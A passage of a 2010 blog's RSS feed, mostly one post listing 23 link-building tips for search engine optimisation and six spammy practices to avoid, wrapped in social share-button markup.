			<a href="http://www.shareaholic.com/api/share/?title=How+to+Add+an+About+Author+Bio+Box+in+the+Post+Footer+in+Wordpress&amp;link=http://samswebguide.com/2010/03/19/how-to-add-an-about-author-box-in-the-post-footer-in-wordpress/&amp;notes=This%20is%20a%20very%20short%20tutorial%20on%20how%20to%20add%20an%20About%20%0D%0AAuthor%20Bio%20Box%20at%20the%20end%20of%20your%20posts%20just%20like%20the%20one%20at%20the%20end%20of%20this%20post.%20An%20author%20box%20is%20very%20important%20because%20it%20further%20connects%20with%20readers%20by%20giving%20a%20little%20background%20information%20on%20the%20author.%20I%20spent%202%20days%20testing%20different&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=257&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-delicious">
			<a href="http://www.shareaholic.com/api/share/?title=How+to+Add+an+About+Author+Bio+Box+in+the+Post+Footer+in+Wordpress&amp;link=http://samswebguide.com/2010/03/19/how-to-add-an-about-author-box-in-the-post-footer-in-wordpress/&amp;notes=This%20is%20a%20very%20short%20tutorial%20on%20how%20to%20add%20an%20About%20%0D%0AAuthor%20Bio%20Box%20at%20the%20end%20of%20your%20posts%20just%20like%20the%20one%20at%20the%20end%20of%20this%20post.%20An%20author%20box%20is%20very%20important%20because%20it%20further%20connects%20with%20readers%20by%20giving%20a%20little%20background%20information%20on%20the%20author.%20I%20spent%202%20days%20testing%20different&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=2&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.shareaholic.com/api/share/?title=How+to+Add+an+About+Author+Bio+Box+in+the+Post+Footer+in+Wordpress&amp;link=http://samswebguide.com/2010/03/19/how-to-add-an-about-author-box-in-the-post-footer-in-wordpress/&amp;notes=This%20is%20a%20very%20short%20tutorial%20on%20how%20to%20add%20an%20About%20%0D%0AAuthor%20Bio%20Box%20at%20the%20end%20of%20your%20posts%20just%20like%20the%20one%20at%20the%20end%20of%20this%20post.%20An%20author%20box%20is%20very%20important%20because%20it%20further%20connects%20with%20readers%20by%20giving%20a%20little%20background%20information%20on%20the%20author.%20I%20spent%202%20days%20testing%20different&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=38&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-digg">
			<a href="http://www.shareaholic.com/api/share/?title=How+to+Add+an+About+Author+Bio+Box+in+the+Post+Footer+in+Wordpress&amp;link=http://samswebguide.com/2010/03/19/how-to-add-an-about-author-box-in-the-post-footer-in-wordpress/&amp;notes=This%20is%20a%20very%20short%20tutorial%20on%20how%20to%20add%20an%20About%20%0D%0AAuthor%20Bio%20Box%20at%20the%20end%20of%20your%20posts%20just%20like%20the%20one%20at%20the%20end%20of%20this%20post.%20An%20author%20box%20is%20very%20important%20because%20it%20further%20connects%20with%20readers%20by%20giving%20a%20little%20background%20information%20on%20the%20author.%20I%20spent%202%20days%20testing%20different&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=3&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-reddit">
			<a href="http://www.shareaholic.com/api/share/?title=How+to+Add+an+About+Author+Bio+Box+in+the+Post+Footer+in+Wordpress&amp;link=http://samswebguide.com/2010/03/19/how-to-add-an-about-author-box-in-the-post-footer-in-wordpress/&amp;notes=This%20is%20a%20very%20short%20tutorial%20on%20how%20to%20add%20an%20About%20%0D%0AAuthor%20Bio%20Box%20at%20the%20end%20of%20your%20posts%20just%20like%20the%20one%20at%20the%20end%20of%20this%20post.%20An%20author%20box%20is%20very%20important%20because%20it%20further%20connects%20with%20readers%20by%20giving%20a%20little%20background%20information%20on%20the%20author.%20I%20spent%202%20days%20testing%20different&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=40&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-linkedin">
			<a href="http://www.shareaholic.com/api/share/?title=How+to+Add+an+About+Author+Bio+Box+in+the+Post+Footer+in+Wordpress&amp;link=http://samswebguide.com/2010/03/19/how-to-add-an-about-author-box-in-the-post-footer-in-wordpress/&amp;notes=This%20is%20a%20very%20short%20tutorial%20on%20how%20to%20add%20an%20About%20%0D%0AAuthor%20Bio%20Box%20at%20the%20end%20of%20your%20posts%20just%20like%20the%20one%20at%20the%20end%20of%20this%20post.%20An%20author%20box%20is%20very%20important%20because%20it%20further%20connects%20with%20readers%20by%20giving%20a%20little%20background%20information%20on%20the%20author.%20I%20spent%202%20days%20testing%20different&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=88&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="shr-blogengage">
			<a href="http://www.shareaholic.com/api/share/?title=How+to+Add+an+About+Author+Bio+Box+in+the+Post+Footer+in+Wordpress&amp;link=http://samswebguide.com/2010/03/19/how-to-add-an-about-author-box-in-the-post-footer-in-wordpress/&amp;notes=This%20is%20a%20very%20short%20tutorial%20on%20how%20to%20add%20an%20About%20%0D%0AAuthor%20Bio%20Box%20at%20the%20end%20of%20your%20posts%20just%20like%20the%20one%20at%20the%20end%20of%20this%20post.%20An%20author%20box%20is%20very%20important%20because%20it%20further%20connects%20with%20readers%20by%20giving%20a%20little%20background%20information%20on%20the%20author.%20I%20spent%202%20days%20testing%20different&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=286&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Engage with this article!">Engage with this article!</a>
		</li>
</ul><div style="clear: both;"></div><div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a></div><div style="clear: both;"></div></div>

]]></content:encoded>
			<wfw:commentRss>http://samswebguide.com/2010/03/19/how-to-add-an-about-author-box-in-the-post-footer-in-wordpress/feed/</wfw:commentRss>
		<slash:comments>26</slash:comments>
		</item>
		<item>
		<title>23 Easy Ways to Guarantee More Links to your Site</title>
		<link>http://samswebguide.com/2010/02/28/23-easy-ways-to-attract-more-links-to-your-site/</link>
		<comments>http://samswebguide.com/2010/02/28/23-easy-ways-to-attract-more-links-to-your-site/#comments</comments>
		<pubDate>Sun, 28 Feb 2010 20:24:59 +0000</pubDate>
		<dc:creator>Sam</dc:creator>
				<category><![CDATA[Other Tutorials]]></category>
		<category><![CDATA[Search Engine Optimization]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[link building]]></category>
		<category><![CDATA[seo]]></category>
		<category><![CDATA[tips]]></category>

		<guid isPermaLink="false">http://samswebguide.com/?p=130</guid>
		<description><![CDATA[There is a growing debate on the net whether link popularity will be relevant in the medium term as search engine algorithms continue to change and evolve to be more efficient and facilitates easier methods for the average webmaster to focus on SEO related tasks. Personally, I think that link building is here to stay ...]]></description>
			<content:encoded><![CDATA[<p>There is a growing debate on the net whether link popularity will be relevant in the medium term as search engine algorithms continue to change and evolve to be more efficient and facilitates easier methods for the average webmaster to focus on SEO related tasks. Personally, I think that link building is here to stay for the foreseeable future since Google uses linking data intensively.<span id="more-130"></span></p>
<p>Though link building is a very time consuming and tedious task, it is very important since search engines like Google use link popularity to determine the trustworthiness of a site and its overall ranking and relevancy in search results.</p>
<p>So, thanks to <a title="SEOBook.com" href="http://www.seobook.com" target="_blank">Seobook.com</a> I&#8217;ve decided to make a list on my favorite effective link building methods and also black-hat practices to avoid.</p>
<p>Here we go:</p>
<p>1. <strong>Create a list of the top 10 myths</strong> for a specific category and do some myth busting.</p>
<p>2. <strong>Create a list of experts/professionals</strong>. If you impress the people listed well enough, or find a way to make your project look somewhat official, the pros may end up linking to your site or saying thanks. (Sometimes flattery is the easiest way to strike up a good relationship with an &#8220;authority&#8221;.)</p>
<p>3. <strong>Make your content easy to understand</strong> so many people can understand and spread your message. Its very important to provide proper explanations of industry jargons, not everyone is an expert and you need to relate to all viewers.</p>
<p>4. <strong>Syndicate an article</strong> at <a title="Ezine Articles" href="http://www.ezinearticles.com/" target="_blank">Ezine Articles</a>, <a title="Articlesbase" href="http://www.articlesbase.com/" target="_blank">Articlesbase</a>, <a title="GoArticles" href="http://www.goarticles.com/" target="_blank">GoArticles</a>, <a title="iSnare" href="http://www.isnare.com/" target="_blank">iSnare</a>, etc. The great thing about good article sites is that their article pages actually rank highly and send highly qualified traffic.</p>
<p>5. <strong>Trade articles with other webmasters</strong> and bloggers</p>
<p>6) <strong>Email a few friends</strong> when you have important relevant news asking them for their feedback and/or if they would mind referencing it if they find your information useful.</p>
<p>7. <strong>Submit your site</strong> to <a title="Dmoz" href="http://www.dmoz.org/" target="_blank">DMOZ </a>and other directories that allow free submissions. DMOZ is an excellent free open source directory, one that google regularly crawls to get information on submitted sites. The only issue that I have is that it can take up to 6 months before your submitted site is listed on DMOZ because it is run by volunteers and they receive thousands of submission requests. Also try to submit to paid directories. Quality Matters.</p>
<p>8. <strong>Create your own topical directory</strong> about your field of interest. Obviously link to your own site, deeplinking to important content where possible. Of course, if you make it into a truly useful resource, it will attract links on its own</p>
<p>9. If you create something that is of great quality make sure you <strong>ask a few friends to tag it for you</strong>. If your site gets on the front page of <a title="Digg" href="http://www.digg.com" target="_blank">Digg </a>or on the <a href="http://delicious.com/" target="_blank">Del.icio.us</a> popular list, hundreds more bloggers will see your site, and potentially link to it</p>
<p>10. <strong>Develop business relationships</strong> with non-competing businesses in the same field. Leverage these relationships online and off, by recommending each other via links and distributing each other&#8217;s business cards. Try guest posting on other blogs as well.</p>
<p>11. Depending on your category and offer, you will find <a title="Craigslist" href="http://www.craigslist.com/" target="_blank">Craigslist </a>to be a cheap or free classified service <strong>(Free Links)</strong></p>
<p>12. <strong>Submit stories to Digg</strong> that links to an article on your site. You can also submit other content and have some of its link authority flow back to your profile page</p>
<p>13. Most forums allow members to <strong>leave signature links or personal profile links</strong>. If you make quality contributions some people will follow these links and potentially read your site and/or link to your site</p>
<p>14. If you buy a product or service you really like and are good at <strong>leaving testimonials, many of those turn into links</strong>. Two testimonial writing tips — make them believable and be specific where possible</p>
<p>15. <strong>Link to other blogs from your blog</strong>. Outbound links are one of the cheapest forms of marketing available. Many bloggers also track who is linking to them or where their traffic comes from, so linking to them is an easy way to get noticed by some of them</p>
<p>16. <strong>Comment on other blog</strong>s. Most of these comments will not provide much direct search engine value, but if your comments are useful, insightful, and relevant they can drive direct traffic. They also help make the other bloggers become aware of you, and they may start reading your blog and/or linking to it</p>
<p>17. <strong><a title="Technorati" href="http://www.technorati.com" target="_blank">Technorati </a>tagged pages rank well in Yahoo! and MSN</strong>, and to a lesser extent in Google. Even if your blog is fairly new you can have your posts featured on the Technorati tag pages by tagging your posts with relevant tags</p>
<p>18. <strong>Swap some links on a small scale</strong> with relevant partners that will send you traffic. Stay away from the link trading hubs and networks. When swapping links, try to get links from within the content of relevant content pages. Do not try to get links from pages that list hundreds of off topic link partners. Only seek link exchanges that you would consider pursuing even if search engines did not exist. Instead of thinking just about your topic when exchanging links, think about demographic audience sets.</p>
<p>19. <strong>Become a sponsor</strong>. Many charities, contests, and conferences link to their sponsors. This can be a great way to gain visibility, links, and a warm feeling in your heart</p>
<p>20. This is one works but proceed with caution <img src='http://samswebguide.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  <strong>Get sued by a company people hate</strong>. This can get you hundreds or thousands of links, including links from sites like <a title="Wired" href="http://www.wired.com" target="_blank">Wired</a> and <a href="http://online.wsj.com/home-page" target="_blank">The Wall Street Journal</a></p>
<p>21. <strong>Host a contest</strong>. Contests make great link bait. A few-hundred-dollars prize can result in thousands of dollars worth of editorial quality links.</p>
<p>22. <strong>Build a tool/free application collection</strong>. Original and useful tools (and collections of tools) get a lot of link love. What do you think ranking for mortgage calculator is worth?</p>
<p>23. <strong>Engaging, useful, and interesting interviews</strong> are an easy way to create original content. And they spread like wildfire. Find successful professionals/guru in your field and request an interview. This also puts an automatic &#8216;stamp of approval&#8217; on your site as it will seem as though they endorse your content/idea</p>
<p><strong>6 Bad Link Building Techniques to Avoid</strong></p>
<p>1. Submit your site to 200 cheesy paid directories (averaging $15 per submission) that send zero traffic and sell off topic run-of-site links</p>
<p>2. List 100 Web sites in your signature file when posting on a forum</p>
<p>3. Posting on forum threads that are years outdated exclusively to link to your semi-related website</p>
<p>4. Instead of signing blog comments with your real name, sign them with spammy keywords. 99% of the time site owners will be annoyed and delete your comments</p>
<p>5. Get links from nearly-hidden sections of websites listing hundreds or thousands of off topic sites</p>
<p>6. Steal content published by well known names. Strip out any attribution. Aggregate many popular channels and just wait for them to start talking about you</p>
<p>And that&#8217;s all for today. Remember, there are many legitimate ways of building links, this list only provides a few of my favorites because of how easy they are to execute for even the newbie blogger/writer.</p>
<p>If there is anything you think I may have left out, feel free to leave a comment with your suggestion or question.</p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-knowledge">
<ul class="socials">
		<li class="shr-twitter">
			<a href="http://www.shareaholic.com/api/share/?title=23+Easy+Ways+to+Guarantee+More+Links+to+your+Site&amp;link=http://samswebguide.com/2010/02/28/23-easy-ways-to-attract-more-links-to-your-site/&amp;notes=There%20is%20a%20growing%20debate%20on%20the%20net%20whether%20link%20popularity%20will%20be%20relevant%20in%20the%20medium%20term%20as%20search%20engine%20algorithms%20continue%20to%20change%20and%20evolve%20to%20be%20more%20efficient%20and%20facilitates%20easier%20methods%20for%20the%20average%20webmaster%20to%20focus%20on%20SEO%20related%20tasks.%20Personally%2C%20I%20think%20that%20link%20buildi&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=%2524%257Btitle%257D%2B-%2B%2524%257Bshort_link%257D&amp;service=7&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.shareaholic.com/api/share/?title=23+Easy+Ways+to+Guarantee+More+Links+to+your+Site&amp;link=http://samswebguide.com/2010/02/28/23-easy-ways-to-attract-more-links-to-your-site/&amp;notes=There%20is%20a%20growing%20debate%20on%20the%20net%20whether%20link%20popularity%20will%20be%20relevant%20in%20the%20medium%20term%20as%20search%20engine%20algorithms%20continue%20to%20change%20and%20evolve%20to%20be%20more%20efficient%20and%20facilitates%20easier%20methods%20for%20the%20average%20webmaster%20to%20focus%20on%20SEO%20related%20tasks.%20Personally%2C%20I%20think%20that%20link%20buildi&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=5&amp;tags=&amp;ctype=" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.shareaholic.com/api/share/?title=23+Easy+Ways+to+Guarantee+More+Links+to+your+Site&amp;link=http://samswebguide.com/2010/02/28/23-easy-ways-to-attract-more-links-to-your-site/&amp;notes=There%20is%20a%20growing%20debate%20on%20the%20net%20whether%20link%20popularity%20will%20be%20relevant%20in%20the%20medium%20term%20as%20search%20engine%20algorithms%20continue%20to%20change%20and%20evolve%20to%20be%20more%20efficient%20and%20facilitates%20easier%20methods%20for%20the%20average%20webmaster%20to%20focus%20on%20SEO%20related%20tasks.%20Personally%2C%20I%20think%20that%20link%20buildi&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=257&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-delicious">
			<a href="http://www.shareaholic.com/api/share/?title=23+Easy+Ways+to+Guarantee+More+Links+to+your+Site&amp;link=http://samswebguide.com/2010/02/28/23-easy-ways-to-attract-more-links-to-your-site/&amp;notes=There%20is%20a%20growing%20debate%20on%20the%20net%20whether%20link%20popularity%20will%20be%20relevant%20in%20the%20medium%20term%20as%20search%20engine%20algorithms%20continue%20to%20change%20and%20evolve%20to%20be%20more%20efficient%20and%20facilitates%20easier%20methods%20for%20the%20average%20webmaster%20to%20focus%20on%20SEO%20related%20tasks.%20Personally%2C%20I%20think%20that%20link%20buildi&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=2&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.shareaholic.com/api/share/?title=23+Easy+Ways+to+Guarantee+More+Links+to+your+Site&amp;link=http://samswebguide.com/2010/02/28/23-easy-ways-to-attract-more-links-to-your-site/&amp;notes=There%20is%20a%20growing%20debate%20on%20the%20net%20whether%20link%20popularity%20will%20be%20relevant%20in%20the%20medium%20term%20as%20search%20engine%20algorithms%20continue%20to%20change%20and%20evolve%20to%20be%20more%20efficient%20and%20facilitates%20easier%20methods%20for%20the%20average%20webmaster%20to%20focus%20on%20SEO%20related%20tasks.%20Personally%2C%20I%20think%20that%20link%20buildi&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=38&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-digg">
			<a href="http://www.shareaholic.com/api/share/?title=23+Easy+Ways+to+Guarantee+More+Links+to+your+Site&amp;link=http://samswebguide.com/2010/02/28/23-easy-ways-to-attract-more-links-to-your-site/&amp;notes=There%20is%20a%20growing%20debate%20on%20the%20net%20whether%20link%20popularity%20will%20be%20relevant%20in%20the%20medium%20term%20as%20search%20engine%20algorithms%20continue%20to%20change%20and%20evolve%20to%20be%20more%20efficient%20and%20facilitates%20easier%20methods%20for%20the%20average%20webmaster%20to%20focus%20on%20SEO%20related%20tasks.%20Personally%2C%20I%20think%20that%20link%20buildi&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=3&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-reddit">
			<a href="http://www.shareaholic.com/api/share/?title=23+Easy+Ways+to+Guarantee+More+Links+to+your+Site&amp;link=http://samswebguide.com/2010/02/28/23-easy-ways-to-attract-more-links-to-your-site/&amp;notes=There%20is%20a%20growing%20debate%20on%20the%20net%20whether%20link%20popularity%20will%20be%20relevant%20in%20the%20medium%20term%20as%20search%20engine%20algorithms%20continue%20to%20change%20and%20evolve%20to%20be%20more%20efficient%20and%20facilitates%20easier%20methods%20for%20the%20average%20webmaster%20to%20focus%20on%20SEO%20related%20tasks.%20Personally%2C%20I%20think%20that%20link%20buildi&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=40&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-linkedin">
			<a href="http://www.shareaholic.com/api/share/?title=23+Easy+Ways+to+Guarantee+More+Links+to+your+Site&amp;link=http://samswebguide.com/2010/02/28/23-easy-ways-to-attract-more-links-to-your-site/&amp;notes=There%20is%20a%20growing%20debate%20on%20the%20net%20whether%20link%20popularity%20will%20be%20relevant%20in%20the%20medium%20term%20as%20search%20engine%20algorithms%20continue%20to%20change%20and%20evolve%20to%20be%20more%20efficient%20and%20facilitates%20easier%20methods%20for%20the%20average%20webmaster%20to%20focus%20on%20SEO%20related%20tasks.%20Personally%2C%20I%20think%20that%20link%20buildi&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=88&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="shr-blogengage">
			<a href="http://www.shareaholic.com/api/share/?title=23+Easy+Ways+to+Guarantee+More+Links+to+your+Site&amp;link=http://samswebguide.com/2010/02/28/23-easy-ways-to-attract-more-links-to-your-site/&amp;notes=There%20is%20a%20growing%20debate%20on%20the%20net%20whether%20link%20popularity%20will%20be%20relevant%20in%20the%20medium%20term%20as%20search%20engine%20algorithms%20continue%20to%20change%20and%20evolve%20to%20be%20more%20efficient%20and%20facilitates%20easier%20methods%20for%20the%20average%20webmaster%20to%20focus%20on%20SEO%20related%20tasks.%20Personally%2C%20I%20think%20that%20link%20buildi&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=286&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Engage with this article!">Engage with this article!</a>
		</li>
</ul><div style="clear: both;"></div><div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a></div><div style="clear: both;"></div></div>

]]></content:encoded>
			<wfw:commentRss>http://samswebguide.com/2010/02/28/23-easy-ways-to-attract-more-links-to-your-site/feed/</wfw:commentRss>
		<slash:comments>20</slash:comments>
		</item>
	</channel>
</rss>

